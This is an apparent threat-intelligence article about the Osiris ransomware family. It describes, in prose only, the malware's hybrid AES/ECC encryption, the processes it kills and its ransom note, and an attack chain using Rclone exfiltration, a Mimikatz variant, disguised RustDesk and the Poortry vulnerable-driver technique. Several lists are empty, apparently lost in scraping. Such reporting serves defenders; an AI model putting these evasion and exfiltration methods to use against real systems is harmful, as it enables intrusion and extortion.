Cybersecurity experts continue to warn organizations about the evolving nature of cybercrime. One of the most alarming developments in recent months is the emergence of Osiris, a newly identified ransomware threat that demonstrates sophisticated techniques and operational maturity. First observed in late 2025, this ransomware has already targeted major organizations and shows signs of being operated by highly experienced attackers. The appearance of Osiris ransomware is another reminder that the global ransomware ecosystem continues to evolve rapidly. Attackers constantly refine their methods, combining new malware families with proven tactics such as data exfiltration, remote access tools, and privilege escalation techniques.
Osiris is a newly discovered ransomware threat that was identified during an attack targeting a major food service franchise operator in Southeast Asia in November 2025. Security researchers investigating the incident concluded that this malware represents a completely new ransomware family.
Although the name “Osiris” may sound familiar to cybersecurity professionals, it is important to note that this ransomware is not related to the Osiris variant discovered in 2016, which was linked to the Locky ransomware family. The modern Osiris threat appears to have been developed independently and shows distinct functionality and design. At the time of analysis, little is known about the developers behind this ransomware threat.
Researchers have not confirmed whether Osiris operates as a ransomware-as-a-service (RaaS) platform or whether it is controlled by a single threat group. However, evidence suggests that the attackers deploying Osiris may have connections to previous Inc ransomware campaigns. These similarities include shared tools, tactics, and operational behaviors that hint at either collaboration or the involvement of former affiliates of existing ransomware groups.
Read: How Criminals Exploit Prepaid SIM Loopholes
Like many modern ransomware families, Osiris includes a wide range of malicious functions designed to maximize the damage inflicted on victims. The ransomware is capable of:
These features allow attackers to disrupt business operations while ensuring that valuable files are inaccessible unless the ransom is paid. One of the distinctive aspects of the Osiris ransomware threat is its flexibility through command-line parameters. Attackers can configure the ransomware to perform specific actions during deployment, such as specifying directories to encrypt or enabling partial or full encryption modes. For example, the ransomware supports options that allow operators to:
This level of control suggests that Osiris was developed by experienced malware authors who understand the needs of ransomware operators conducting targeted attacks.
A common strategy used by ransomware developers is to avoid encrypting certain system files that could break the operating system completely. If a system becomes unusable, victims may simply restore backups rather than paying the ransom. The Osiris ransomware threat follows this same strategy. It deliberately skips several file extensions, including:
Similarly, it avoids encrypting critical system directories such as:
By avoiding these locations, the ransomware ensures that the system remains functional enough for victims to read the ransom note and communicate with attackers. After encryption, the malware appends the “.Osiris” extension to affected files. For instance, a file named document.txt would become document.txt.Osiris. This extension serves as a clear indicator that files have been compromised by the Osiris ransomware attack.
One of the most critical components of any ransomware threat is its encryption mechanism. Osiris uses a hybrid encryption scheme that combines modern cryptographic techniques. The ransomware utilizes:
Each file encrypted by Osiris receives its own unique AES key, making decryption without the attacker’s private key extremely difficult. This approach is commonly used by advanced ransomware families because it balances speed and security. AES encryption allows rapid file processing, while ECC protects the encryption keys from recovery.
Additionally, the ransomware uses a Windows function called completionIOPort to manage asynchronous input/output requests during encryption. This allows the malware to encrypt files efficiently without causing obvious system slowdowns that might alert users.
To maximize the effectiveness of its attack, the Osiris ransomware threat actively terminates processes that might interfere with encryption. Examples of targeted processes include:
By stopping these processes, attackers ensure that important files are unlocked and accessible for encryption. In addition to processes, Osiris also stops critical services such as:
This tactic prevents victims from easily restoring files using system snapshots or backup tools.
Once encryption is complete, the ransomware drops a file named “Osiris-MESSAGE.txt.” This ransom note informs victims that their files have been encrypted and that sensitive data has been stolen. It typically includes a link to a negotiation platform where victims can communicate directly with the attackers to discuss payment.
The attackers also threaten to leak the stolen data if the ransom is not paid, a tactic commonly known as double extortion. This strategy has become a common practice in modern ransomware operations because it significantly increases pressure on victims to comply with the attackers’ ransom demands.
Understanding how Osiris ransomware spreads is essential for organizations that want to prevent similar attacks. Based on investigations, the attack chain observed in the 2025 incident involved multiple stages, beginning with data exfiltration and followed by credential theft, reconnaissance, and remote access.
One of the earliest indicators of the attack was the use of Rclone, a legitimate command-line tool commonly used for transferring files to cloud storage. In this campaign, attackers used Rclone to exfiltrate sensitive data from the victim’s network to a Wasabi cloud storage bucket. This method allows cybercriminals to move large volumes of data efficiently while blending their activity with normal network traffic. Notably, the same tactic had previously been observed in operations linked to the Inc ransomware group, suggesting potential similarities between the campaigns.
Another important tool used during the attack was Mimikatz, a well-known credential harvesting utility widely used by threat actors. In this case, attackers deployed a variant of Mimikatz named kaz.exe, which had also been seen in earlier Inc ransomware incidents. The reuse of the same filename and tool variant strengthens the theory that the operators behind the Osiris ransomware threat may have prior experience with other ransomware operations.
The attackers also relied on several legitimate administrative tools such as Netscan, Netexec, and MeshAgent. These tools are commonly used by system administrators for network management but can also be abused by attackers for malicious purposes. In this campaign, they were likely used for reconnaissance, lateral movement within the network, and maintaining persistence on compromised systems. This technique, often referred to as “living off the land,” helps attackers avoid detection because the tools themselves are not inherently malicious.
Another notable aspect of the attack was the use of a modified version of RustDesk, an open-source remote desktop application. The attackers altered the software to disguise its real purpose by configuring it to appear as “WinZip Remote Desktop” and assigning it the WinZip application icon. This type of camouflage helps the malicious tool appear legitimate to users and security systems, allowing attackers to maintain remote access without immediately raising suspicion.
These combined techniques demonstrate that the operators behind the Osiris ransomware threat relied on a carefully coordinated attack chain, leveraging both legitimate tools and modified software to infiltrate networks and prepare systems for ransomware deployment.
One of the most sophisticated elements of the Osiris ransomware threat is the use of a malicious driver called Poortry, also known as Abyssworker. This driver played a critical role in weakening security defenses during the attack. It was deployed as part of a Bring Your Own Vulnerable Driver (BYOVD) attack, a technique increasingly used by ransomware operators to bypass modern security protections.
In BYOVD attacks, cybercriminals load vulnerable or malicious drivers onto a system to gain kernel-level access, which allows them to disable security software and bypass defensive mechanisms. Poortry is particularly unusual because it appears to be a custom driver that attackers managed to get digitally signed, which makes it more difficult for security tools to detect. Once deployed, the driver can terminate security processes and disable protective software, making it extremely valuable for ransomware operators preparing the environment for encryption.
In addition to the Poortry driver, the attackers behind the Osiris ransomware threat deployed several other tools to maintain control over the compromised network and disrupt defensive mechanisms. These tools helped them strengthen their foothold and ensure that security solutions could not easily stop the attack.
These tools allowed the attackers to terminate antivirus processes and maintain remote access to the compromised environment. Their use demonstrates that the operation was carefully planned and executed with multiple layers of attack techniques.
Although researchers have not definitively linked Osiris ransomware to a specific threat group, several indicators suggest that the attackers may have connections to previously active ransomware operators. The overlap in tactics and tools raises the possibility that experienced affiliates from other ransomware campaigns are involved. Indicators suggesting potential links include:
Additionally, the Poortry driver has previously been observed in attacks associated with the Medusa ransomware group. However, since Poortry is not exclusive to a single threat actor, its presence alone does not confirm attribution. Instead, it highlights how ransomware operators frequently share tools and techniques across the cybercriminal ecosystem.
The emergence of Osiris highlights several important trends in the evolving ransomware landscape. As cybercriminal groups continue to refine their methods, ransomware attacks are becoming increasingly complex and difficult to detect.
Modern ransomware campaigns often combine data theft, privilege escalation, and advanced encryption techniques to maximize their impact. In addition, the ransomware ecosystem is highly dynamic, with new malware families appearing frequently and often being developed by attackers who previously worked with other ransomware groups.
These attacks are rarely simple malware infections. Instead, they are usually multi-stage operations involving reconnaissance, lateral movement, and data exfiltration before encryption occurs. As a result, organizations that fail to detect early warning signs may only discover the intrusion when ransomware is finally deployed.
Given the growing sophistication of threats like Osiris ransomware, organizations must adopt a proactive and layered cybersecurity strategy. Preventing ransomware attacks requires a combination of strong technical defenses, monitoring capabilities, and employee awareness. Key defensive measures include:
In addition to these measures, organizations should maintain reliable offline backups so critical data can be restored without paying a ransom. Regular cybersecurity awareness training is also essential, as many ransomware attacks begin with phishing emails or credential compromise that provide attackers with their initial access point.
Read: How to Stay Safe from MIMICRAT Infections
The discovery of Osiris highlights the evolving nature of modern ransomware threats. With advanced encryption, defense evasion techniques, and a complex attack chain, Osiris demonstrates the capabilities of experienced cybercriminals. As ransomware continues to grow more sophisticated, organizations must strengthen their cybersecurity defenses and stay vigilant to detect threats early and reduce the risk of serious data loss.